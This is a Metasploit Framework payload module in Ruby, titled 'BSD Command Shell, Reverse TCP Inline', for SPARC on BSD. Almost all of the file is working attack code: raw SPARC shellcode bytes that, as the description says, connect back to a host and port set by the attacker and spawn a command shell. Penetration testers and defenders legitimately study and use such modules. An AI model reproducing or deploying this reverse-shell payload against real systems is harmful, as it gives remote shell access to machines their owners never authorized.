1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 128
8

9
  include Msf::Payload::Single
10
  include Msf::Payload::Bsd
11
  include Msf::Sessions::CommandShellOptions
12

13
  def initialize(info = {})
14
    super(
15
      merge_info(
16
        info,
17
        'Name' => 'BSD Command Shell, Reverse TCP Inline',
18
        'Description' => 'Connect back to attacker and spawn a command shell',
19
        'Author' => 'vlad902',
20
        'License' => MSF_LICENSE,
21
        'Platform' => 'bsd',
22
        'Arch' => ARCH_SPARC,
23
        'Handler' => Msf::Handler::ReverseTcp,
24
        'Session' => Msf::Sessions::CommandShell
25
      )
26
    )
27
  end
28

29
  def generate(_opts = {})
30
    port = (datastore['RPORT'] || '0').to_i
31
    host = nil
32
    begin
33
      host = Rex::Socket.resolv_nbo_i(datastore['RHOST'] || '127.0.0.1')
34
    rescue SocketError
35
      host = Rex::Socket.resolv_nbo_i('127.0.0.1')
36
    end
37

38
    "\x9c\x2b\xa0\x07\x94\x1a\xc0\x0b\x92\x10\x20\x01\x90\x10\x20\x02" \
39
      "\x82\x10\x20\x61\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x92\x10\x20\x03" \
40
      "\x92\xa2\x60\x01\x82\x10\x20\x5a\x91\xd0\x20\x08\x12\xbf\xff\xfd" \
41
      "\xd0\x03\xbf\xf8" +
42
      Rex::Arch::Sparc.set(0xff020000 | port, 'l0') +
43
      Rex::Arch::Sparc.set(host, 'l1') +
44
      "\xe0\x3b\xbf\xf0\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\x62" \
45
      "\x91\xd0\x20\x08\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a\xa0\x14\x21\x6e" \
46
      "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0" \
47
      "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
48
  end
49
end
50

51